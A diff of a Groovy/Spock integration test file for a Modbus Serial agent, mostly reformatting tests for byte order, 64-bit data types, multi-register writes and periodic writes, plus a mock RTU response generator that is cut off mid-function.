-            assert assetStorageService.find(agentLittleBig.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-            assert assetStorageService.find(agentLittleLittle.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "devices with 32-bit float values are created for each agent"
-        def deviceBigBig = createDeviceWithFloat(assetStorageService, "Device BIG-BIG", agentBigBig, 401)
-        def deviceBigLittle = createDeviceWithFloat(assetStorageService, "Device BIG-LITTLE", agentBigLittle, 411)
-        def deviceLittleBig = createDeviceWithFloat(assetStorageService, "Device LITTLE-BIG", agentLittleBig, 421)
-        def deviceLittleLittle = createDeviceWithFloat(assetStorageService, "Device LITTLE-LITTLE", agentLittleLittle, 431)
-
-        then: "all devices should receive float values"
-        conditions.eventually {
-            deviceBigBig = assetStorageService.find(deviceBigBig.getId(), true)
-            deviceBigLittle = assetStorageService.find(deviceBigLittle.getId(), true)
-            deviceLittleBig = assetStorageService.find(deviceLittleBig.getId(), true)
-            deviceLittleLittle = assetStorageService.find(deviceLittleLittle.getId(), true)
-
-            // All should have received values (mock returns endian-specific test data)
-            assert deviceBigBig.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
-            assert deviceBigLittle.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
-            assert deviceLittleBig.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
-            assert deviceLittleLittle.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
-
-            // BIG-BIG should get the standard value (42.5)
-            def valueBigBig = deviceBigBig.getAttribute("floatValue").flatMap { it.getValue() }.get() as Double
-            assert Math.abs(valueBigBig - 42.5) < 0.1
-
-            // Other combinations will have different byte arrangements resulting in different values
-            // This verifies that the byte/word order is being applied
-            def valueBigLittle = deviceBigLittle.getAttribute("floatValue").flatMap { it.getValue() }.get() as Double
-            def valueLittleBig = deviceLittleBig.getAttribute("floatValue").flatMap { it.getValue() }.get() as Double
-            def valueLittleLittle = deviceLittleLittle.getAttribute("floatValue").flatMap { it.getValue() }.get() as Double
-
-            // Values should differ based on byte/word order (exact values depend on mock implementation)
-            assert valueBigBig != valueBigLittle || valueBigBig != valueLittleBig || valueBigBig != valueLittleLittle
-        }
-
-        when: "devices with 64-bit double values are created"
-        def device64BigBig = createDeviceWithDouble(assetStorageService, "Device64 BIG-BIG", agentBigBig, 501)
-        def device64LittleLittle = createDeviceWithDouble(assetStorageService, "Device64 LITTLE-LITTLE", agentLittleLittle, 511)
-
-        then: "64-bit values should also be affected by byte/word order"
-        conditions.eventually {
-            device64BigBig = assetStorageService.find(device64BigBig.getId(), true)
-            device64LittleLittle = assetStorageService.find(device64LittleLittle.getId(), true)
-
-            assert device64BigBig.getAttribute("doubleValue").flatMap { it.getValue() }.isPresent()
-            assert device64LittleLittle.getAttribute("doubleValue").flatMap { it.getValue() }.isPresent()
-
-            def doubleBigBig = device64BigBig.getAttribute("doubleValue").flatMap { it.getValue() }.get() as Double
-            def doubleLittleLittle = device64LittleLittle.getAttribute("doubleValue").flatMap { it.getValue() }.get() as Double
-
-            // BIG-BIG should get the standard value (999.888)
-            assert Math.abs(doubleBigBig - 999.888) < 0.001
-
-            // LITTLE-LITTLE should get a different value due to byte/word swapping
-            assert doubleBigBig != doubleLittleLittle
-        }
+      // Check ULINT (unsigned BigInteger) - should be 18446744073709551000
+      def longUnsignedValue = device.getAttribute("longUnsignedValue").flatMap {
+        it.getValue()
+      }.orElse(null)
+      assert longUnsignedValue != null
+      assert longUnsignedValue instanceof BigInteger
+      assert longUnsignedValue == new BigInteger("18446744073709551000")
     }
 
-    def "Modbus Serial Test - 64-bit Data Types (LINT, ULINT, LREAL)"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    and: "verify protocol instance has created batch groups"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
+      assert protocol != null
+      assert protocol.batchGroups.size() > 0
+    }
+  }
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+  def "Modbus Serial Test - Multi-Register Write (registersAmount)"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
 
-        and: "a Modbus Serial agent is created"
-        def agent = new ModbusSerialAgent("Modbus RTU 64-bit Test")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
 
-        agent = assetStorageService.merge(agent)
+    and: "a Modbus Serial agent is created"
+    def agent = new ModbusSerialAgent("Modbus Serial Multi-Write")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN)
+            )
+    agent = assetStorageService.merge(agent)
 
-        and: "the agent is linked to a device with 64-bit data types"
-        def device = new ThingAsset("64-bit Test Device")
-        device.setRealm(MASTER_REALM)
-        device.setParent(agent)
-        device.addOrReplaceAttributes(
-                // LREAL - Double precision float at address 301 (4 registers, 1-based = 300 protocol)
-                new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
-                                    it.setReadAddress(301)
-                                }
-                        )
-                ),
-                // LINT - 64-bit signed integer at address 311 (4 registers, 1-based = 310 protocol)
-                new Attribute<>("longSignedValue", ValueType.LONG).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.LINT)
-                                    it.setReadAddress(311)
-                                }
-                        )
-                ),
-                // ULINT - 64-bit unsigned integer at address 321 (4 registers, 1-based = 320 protocol)
-                new Attribute<>("longUnsignedValue", ValueType.BIG_INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.ULINT)
-                                    it.setReadAddress(321)
-                                }
-                        )
-                )
-        )
-
-        device = assetStorageService.merge(device)
-
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            def actualAgent = assetStorageService.find(agent.getId(), true) as ModbusSerialAgent
-            assert actualAgent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        and: "all 64-bit attributes should receive values"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
-
-            // Check LREAL (double) - should be 123.456789
-            def doubleValue = device.getAttribute("doubleValue").flatMap { it.getValue() }.orElse(null)
-            assert doubleValue != null
-            assert doubleValue instanceof Number
-            assert Math.abs(((Number) doubleValue).doubleValue() - 123.456789d) < 0.000001
-
-            // Check LINT (signed long) - should be -9223372036854775000L
-            def longSignedValue = device.getAttribute("longSignedValue").flatMap { it.getValue() }.orElse(null)
-            assert longSignedValue != null
-            assert longSignedValue instanceof Long
-            assert longSignedValue == -9223372036854775000L
-
-            // Check ULINT (unsigned BigInteger) - should be 18446744073709551000
-            def longUnsignedValue = device.getAttribute("longUnsignedValue").flatMap { it.getValue() }.orElse(null)
-            assert longUnsignedValue != null
-            assert longUnsignedValue instanceof BigInteger
-            assert longUnsignedValue == new BigInteger("18446744073709551000")
-        }
-
-        and: "verify protocol instance has created batch groups"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
-            assert protocol != null
-            assert protocol.batchGroups.size() > 0
-        }
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus Serial Test - Multi-Register Write (registersAmount)"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    when: "a device with multi-register write attributes is created"
+    def device = new ThingAsset("Multi-Write Serial Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            // Write FLOAT (2 registers) to address 51 (1-based = 50 protocol)
+            new Attribute<>("floatWrite", ValueType.NUMBER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
+                      it.setReadAddress(51)
+                      it.setRegistersAmount(2)
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                      it.setWriteAddress(51)
+                    }
+                    ))
+            )
+    device = assetStorageService.merge(device)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-
-        and: "a Modbus Serial agent is created"
-        def agent = new ModbusSerialAgent("Modbus Serial Multi-Write")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN)
-        )
-        agent = assetStorageService.merge(agent)
-
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "a device with multi-register write attributes is created"
-        def device = new ThingAsset("Multi-Write Serial Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                // Write FLOAT (2 registers) to address 51 (1-based = 50 protocol)
-                new Attribute<>("floatWrite", ValueType.NUMBER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
-                                    it.setReadAddress(51)
-                                    it.setRegistersAmount(2)
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(51)
-                                }
-                ))
-        )
-        device = assetStorageService.merge(device)
-
-        then: "device should be linked"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
-            assert device.getAttribute("floatWrite").isPresent()
-        }
-
-        when: "multi-register float value is written"
-        latestRequest = null
-        latestWriteRequest = null
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "floatWrite", 45.67f))
-
-        then: "the write should use function code 0x10 (Write Multiple Registers)"
-        conditions.eventually {
-            def request = latestRequest
-            assert request != null
-            assert request[0] == (byte) 1  // Unit ID
-            assert request[1] == (byte) 0x10  // Function code 0x10 for multi-register write
-            assert ((request[2] & 0xFF) << 8 | (request[3] & 0xFF)) == 50  // Start address
-            assert ((request[4] & 0xFF) << 8 | (request[5] & 0xFF)) == 2  // Register count
-            assert request[6] == (byte) 4  // Byte count (2 registers * 2 bytes)
-        }
+    then: "device should be linked"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
+      assert device.getAttribute("floatWrite").isPresent()
     }
 
-    def "Modbus Serial Test - Write With Polling Rate"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    when: "multi-register float value is written"
+    latestRequest = null
+    latestWriteRequest = null
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "floatWrite", 45.67f))
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "the write should use function code 0x10 (Write Multiple Registers)"
+    conditions.eventually {
+      def request = latestRequest
+      assert request != null
+      assert request[0] == (byte) 1 // Unit ID
+      assert request[1] == (byte) 0x10 // Function code 0x10 for multi-register write
+      assert ((request[2] & 0xFF) << 8 | (request[3] & 0xFF)) == 50 // Start address
+      assert ((request[4] & 0xFF) << 8 | (request[5] & 0xFF)) == 2 // Register count
+      assert request[6] == (byte) 4 // Byte count (2 registers * 2 bytes)
+    }
+  }
 
-        and: "a Modbus Serial agent is created"
-        def agent = new ModbusSerialAgent("Modbus Serial Polling Write")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN)
-        )
-        agent = assetStorageService.merge(agent)
+  def "Modbus Serial Test - Write With Polling Rate"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus Serial agent is created"
+    def agent = new ModbusSerialAgent("Modbus Serial Polling Write")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN)
+            )
+    agent = assetStorageService.merge(agent)
+
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+    when: "a device with continuous write (requestInterval + writeAddress, no readAddress) is created"
+    def device = new ThingAsset("Continuous Write Serial Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("continuousWrite", ValueType.INTEGER, 77).addOrReplaceMeta(
+                    new MetaItem<>(
+                            AGENT_LINK,
+                            new ModbusAgentLink(agent.getId())
+                            .tap {
+                              it.setUnitId(1)
+                              it.setRequestInterval(1000) // Write every 1000ms
+                              it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                              it.setWriteAddress(61)
+                              // No readAddress = continuous write mode
+                            }
+                            ),
+                    new MetaItem<>(STORE_DATA_POINTS)
+                    )
+            )
+    device = assetStorageService.merge(device)
+
+    then: "write request task should be created"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
+      assert protocol != null
+      assert protocol.writeIntervalMap.size() == 1
+    }
+
+    def assetDatapointService = container.getService(org.openremote.manager.datapoint.AssetDatapointService.class)
+    def attributeRef = new org.openremote.model.attribute.AttributeRef(device.getId(), "continuousWrite")
+
+    then: "multiple write events should be observed"
+    def writeRequests = new CopyOnWriteArrayList<>()
+    conditions.eventually {
+      def request = latestRequest
+      if (request != null) {
+        // Capture write requests (function codes 0x05, 0x06, 0x10)
+        def functionCode = request[1] & 0xFF
+        if (functionCode == 0x06 || functionCode == 0x05 || functionCode == 0x10) {
+          writeRequests.add(request.clone())
         }
-
-        when: "a device with continuous write (requestInterval + writeAddress, no readAddress) is created"
-        def device = new ThingAsset("Continuous Write Serial Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("continuousWrite", ValueType.INTEGER, 77).addOrReplaceMeta(
-                        new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)  // Write every 1000ms
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(61)
-                                    // No readAddress = continuous write mode
-                                }
-                        ),
-                        new MetaItem<>(STORE_DATA_POINTS)
-                )
-        )
-        device = assetStorageService.merge(device)
-
-        then: "write request task should be created"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
-            assert protocol != null
-            assert protocol.writeIntervalMap.size() == 1
-        }
-
-        def assetDatapointService = container.getService(org.openremote.manager.datapoint.AssetDatapointService.class)
-        def attributeRef = new org.openremote.model.attribute.AttributeRef(device.getId(), "continuousWrite")
-
-        then: "multiple write events should be observed"
-        def writeRequests = new CopyOnWriteArrayList<>()
-        conditions.eventually {
-            def request = latestRequest
-            if (request != null) {
-                // Capture write requests (function codes 0x05, 0x06, 0x10)
-                def functionCode = request[1] & 0xFF
-                if (functionCode == 0x06 || functionCode == 0x05 || functionCode == 0x10) {
-                    writeRequests.add(request.clone())
-                }
-            }
-            // Wait to accumulate multiple writes
-            Thread.sleep(2500) // Wait for ~2-3 write cycles at 1000ms interval
-            assert writeRequests.size() >= 2  // Should have at least 2 writes
-        }
-
-
-        then: "database should show 1 datapoint"
-        conditions.eventually {
-            // Query datapoints stored for this attribute - continuous writes should create no extra datapoints
-            def datapoints = assetDatapointService.getDatapoints(attributeRef)
-            println "Datapoints found: ${datapoints.size()}"
-            datapoints.each { println "  - timestamp: ${it.timestamp}, value: ${it.value}" }
-            assert datapoints.size() == 1  // Should have 1 datapoint from periodic writes
-        }
+      }
+      // Wait to accumulate multiple writes
+      Thread.sleep(2500) // Wait for ~2-3 write cycles at 1000ms interval
+      assert writeRequests.size() >= 2 // Should have at least 2 writes
     }
 
 
-    // Helper methods for endian format tests
-    private ModbusSerialAgent createAgentWithEndianFormat(AssetStorageService assetStorageService,
-                                                           String name,
-                                                           ModbusAgent.EndianFormat endianFormat) {
-        def agent = new ModbusSerialAgent(name)
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(endianFormat, "", 50)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
-        return assetStorageService.merge(agent)
+    then: "database should show 1 datapoint"
+    conditions.eventually {
+      // Query datapoints stored for this attribute - continuous writes should create no extra datapoints
+      def datapoints = assetDatapointService.getDatapoints(attributeRef)
+      println "Datapoints found: ${datapoints.size()}"
+      datapoints.each { println "  - timestamp: ${it.timestamp}, value: ${it.value}" }
+      assert datapoints.size() == 1 // Should have 1 datapoint from periodic writes
     }
+  }
 
-    private ThingAsset createDeviceWithFloat(AssetStorageService assetStorageService,
-                                             String name,
-                                             ModbusSerialAgent agent,
-                                             int address) {
-        def device = new ThingAsset(name)
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("floatValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
-                                    it.setReadAddress(address)
-                                    it.setRegistersAmount(2)
-                                }
-                        )
-                )
-        )
-        return assetStorageService.merge(device)
-    }
 
-    private ThingAsset createDeviceWithDouble(AssetStorageService assetStorageService,
-                                              String name,
-                                              ModbusSerialAgent agent,
-                                              int address) {
-        def device = new ThingAsset(name)
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
-                                    it.setReadAddress(address)
-                                    it.setRegistersAmount(4)
-                                }
-                        )
-                )
-        )
-        return assetStorageService.merge(device)
-    }
+  // Helper methods for endian format tests
+  private ModbusSerialAgent createAgentWithEndianFormat(AssetStorageService assetStorageService,
+          String name,
+          ModbusAgent.EndianFormat endianFormat) {
+    def agent = new ModbusSerialAgent(name)
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(endianFormat, "", 50)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+    return assetStorageService.merge(agent)
+  }
 
-    /**
-     * Generate Modbus RTU responses for various function codes
-     */
-    private static byte[] generateModbusResponse(byte[] request, int offset, int length) {
-        if (length < 6) return new byte[0]
+  private ThingAsset createDeviceWithFloat(AssetStorageService assetStorageService,
+          String name,
+          ModbusSerialAgent agent,
+          int address) {
+    def device = new ThingAsset(name)
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("floatValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
+                      it.setReadAddress(address)
+                      it.setRegistersAmount(2)
+                    }
+                    )
+                    )
+            )
+    return assetStorageService.merge(device)
+  }
 
-        int unitId = request[offset] & 0xFF
-        int functionCode = request[offset + 1] & 0xFF
-        int address = ((request[offset + 2] & 0xFF) << 8) | (request[offset + 3] & 0xFF)
-        int quantity = ((request[offset + 4] & 0xFF) << 8) | (request[offset + 5] & 0xFF)
+  private ThingAsset createDeviceWithDouble(AssetStorageService assetStorageService,
+          String name,
+          ModbusSerialAgent agent,
+          int address) {
+    def device = new ThingAsset(name)
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
+                      it.setReadAddress(address)
+                      it.setRegistersAmount(4)
+                    }
+                    )
+                    )
+            )
+    return assetStorageService.merge(device)
+  }
 
-        byte[] response
+  /**
+   * Generate Modbus RTU responses for various function codes
+   */
+  private static byte[] generateModbusResponse(byte[] request, int offset, int length) {
+    if (length < 6) return new byte[0]
 
-        switch (functionCode) {
-        case 0x01: // Read Coils
-        case 0x02: // Read Discrete Inputs
-            int byteCount = (quantity + 7) / 8
-            response = new byte[5 + byteCount]
-            response[0] = (byte) unitId
-            response[1] = (byte) functionCode
-            response[2] = (byte) byteCount
-            // Fill with alternating bits
-            for (int i = 0; i < byteCount; i++) {
-                response[3 + i] = (byte) 0xAA
-            }
+    int unitId = request[offset] & 0xFF
+    int functionCode = request[offset + 1] & 0xFF
+    int address = ((request[offset + 2] & 0xFF) << 8) | (request[offset + 3] & 0xFF)
+    int quantity = ((request[offset + 4] & 0xFF) << 8) | (request[offset + 5] & 0xFF)
+
+    byte[] response
+
+    switch (functionCode) {
+      case 0x01: // Read Coils
+      case 0x02: // Read Discrete Inputs
+        int byteCount = (quantity + 7) / 8
+        response = new byte[5 + byteCount]
+        response[0] = (byte) unitId
+        response[1] = (byte) functionCode
+        response[2] = (byte) byteCount
+      // Fill with alternating bits
+        for (int i = 0; i <byteCount; i++) {
+          response[3 + i] = (byte) 0xAA
+        }
+        break
+
+      case 0x03: // Read Holding Registers
+      case 0x04: // Read Input Registers
+        int registerBytes = quantity * 2
+        response = new byte[5 + registerBytes]
+        response[0] = (byte) unitId
+        response[1] = (byte) functionCode
+        response[2] = (byte) registerBytes
+
+      // Generate test data based on address
+      // Handle special test data addresses for different data types
+        for (int i = 0; i <quantity; i++) {
+          int currentAddress = address + i
+          int responseOffset = 3 + i * 2
+
+          // Check if this register is part of a special test value
+          if (currentAddress >= 200 && currentAddress < 202 && address == 200 && quantity == 2) {
+            // Return float value 23.5
+            ByteBuffer bb = ByteBuffer.allocate(4)
+            bb.order(ByteOrder.BIG_ENDIAN)
+            bb.putFloat(23.5f)
+            byte[] floatBytes = bb.array()
+            System.arraycopy(floatBytes, 0, response, 3, 4)
             break
-
-        case 0x03: // Read Holding Registers
-        case 0x04: // Read Input Registers
-            int registerBytes = quantity * 2
-            response = new byte[5 + registerBytes]
-            response[0] = (byte) unitId
-            response[1] = (byte) functionCode
-            response[2] = (byte) registerBytes
-
-            // Generate test data based on address
-            // Handle special test data addresses for different data types
-            for (int i = 0; i < quantity; i++) {
-                int currentAddress = address + i
-                int responseOffset = 3 + i * 2
-
-                // Check if this register is part of a special test value
-                if (currentAddress >= 200 && currentAddress < 202 && address == 200 && quantity == 2) {
-                    // Return float value 23.5
-                    ByteBuffer bb = ByteBuffer.allocate(4)
-                    bb.order(ByteOrder.BIG_ENDIAN)
-                    bb.putFloat(23.5f)
-                    byte[] floatBytes = bb.array()
-                    System.arraycopy(floatBytes, 0, response, 3, 4)
-                    break
-                } else if (currentAddress >= 300 && currentAddress < 304) {
-                    // Return double value 123.456789 at registers 300-303
-                    if (i == 0 || currentAddress == 300) {
-                        int regOffset = currentAddress - 300
-                        ByteBuffer bb = ByteBuffer.allocate(8)
-                        bb.order(ByteOrder.BIG_ENDIAN)
-                        bb.putDouble(123.456789d)
-                        byte[] doubleBytes = bb.array()
-                        int copyLen = Math.min(registerBytes - (responseOffset - 3), 8 - (regOffset * 2))
-                        System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, Math.min(copyLen, 8))
-                    }
-                } else if (currentAddress >= 310 && currentAddress < 314) {
-                    // Return 64-bit signed integer: -9223372036854775000L at registers 310-313
-                    int regOffset = currentAddress - 310
-                    ByteBuffer bb = ByteBuffer.allocate(8)
-                    bb.order(ByteOrder.BIG_ENDIAN)
-                    bb.putLong(-9223372036854775000L)
-                    byte[] longBytes = bb.array()
-                    response[responseOffset] = longBytes[regOffset * 2]
-                    response[responseOffset + 1] = longBytes[regOffset * 2 + 1]
-                } else if (currentAddress >= 320 && currentAddress < 324) {
-                    // Return 64-bit unsigned integer at registers 320-323
-                    int regOffset = currentAddress - 320
